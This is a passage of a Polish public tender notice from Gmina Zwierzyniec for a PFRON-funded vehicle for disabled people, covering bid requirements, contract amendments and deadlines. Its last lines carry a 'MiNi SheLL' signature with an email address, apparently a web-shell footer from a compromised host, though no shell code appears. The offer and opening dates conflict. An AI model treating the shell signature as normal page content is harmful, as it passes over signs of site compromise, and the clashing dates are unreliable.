SWZ;<br/>4) 3) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby<br/>jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji I Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a),<br/>jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy.<br/>5) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia o których mowa w pkt.<br/>8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian postanowień umowy w sprawie zamówienia w stosunku do treści wybranej<br/>oferty, dotyczących przedmiotu zamówienia, wysokości wynagrodzenia, sposobu realizacji zamówienia oraz terminu<br/>realizacji umowy i terminu płatności, w szczególności w przypadku:<br/>1) zmian w obowiązujących przepisach prawa, powodujących konieczność dokonania zmian w umowie,<br/>2) w zakresie obowiązującej stawki podatku VAT, w przypadku zmian powszechnie obowiązującego prawa w tym zakresie,<br/>3) w przypadku dokonania określonych czynności lub ich zaniechania przez organy administracji państwowej, w tym organy<br/>administracji rządowej, samorządowej, jak również organów i podmiotów, których działalność wymaga wydania jakiejkolwiek<br/>decyzji o charakterze administracyjnym w trakcie wykonywania przedmiotu niniejszej umowy,<br/>4) zaistnienia siły wyższej rozumianej jako zdarzenia pozostające poza kontrolą każdej ze Stron, których strony nie mogły<br/>przewidzieć ani im zapobiec, i które zakłóca-ją lub uniemożliwiają realizację umowy, takie zdarzenia obejmują w<br/>szczególności: wojny, rewolucje, pożary, powodzie, działania terrorystyczne, zakłócenia spowodowane wprowadzeniem<br/>zabezpieczeń antyterrorystycznych,<br/>5) w przypadku, kiedy konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z<br/>należytą starannością, nie mógł przewidzieć a wartość zmiany nie przekracza 50% wartości zamówienia określonej<br/>pierwotnie w umowie,<br/>6) zaistnienia przyczyn organizacyjnych lub finansowych leżących po Stronie Zamawiającego, w szczególności<br/>wynikających ze zmiany umowy o dofinansowanie ze środków PFRON w ramach „Programu wyrównywania różnic między<br/>regionami III” w obszarze D, zawartej pomiędzy Zamawiającym, a Powiatem Zamojskim.<br/>2. W opisanych przypadkach zmianie (w tym ograniczeniu) ulec mogą odpowiednio za-kres rzeczowy przedmiotu<br/>zamówienia, cena umowy brutto, termin płatności, zasady rozliczeń (o ile zmiana zasad rozliczeń nie spowoduje<br/>konieczności zapłaty Wykonawcy odsetek lub wynagrodzenia w większej kwocie), termin realizacji umowy, sposób realizacji<br/>przedmiotu zamówienia, w tym zmiana materiałów lub technologii wykonania zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-08 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.sidaspzp.pl/zamawiajacy/gmina-zwierzyniec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-08 08:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego.<br/>Zamawiający informuje, że zadanie jest dofinansowane ze środków Państwowego Funduszu Rehabilitacji Osób<br/>Niepełnosprawnych (PFRON) w ramach projektu pn. „Zakup samochodu do przewozu osób niepełnosprawnych dla<br/>Środowiskowego Domu Samopomocy im. Ofiar Pacyfikacji w Sochach” w ramach. „Programu wyrównywania różnic między<br/>regionami III” w obszarze D.<br/>Ogłoszenie nr 2025/BZP 00385664/01 z dnia 2025-08-21<br/>2025-

Creat By MiNi SheLL
Email: jattceo@gmail.com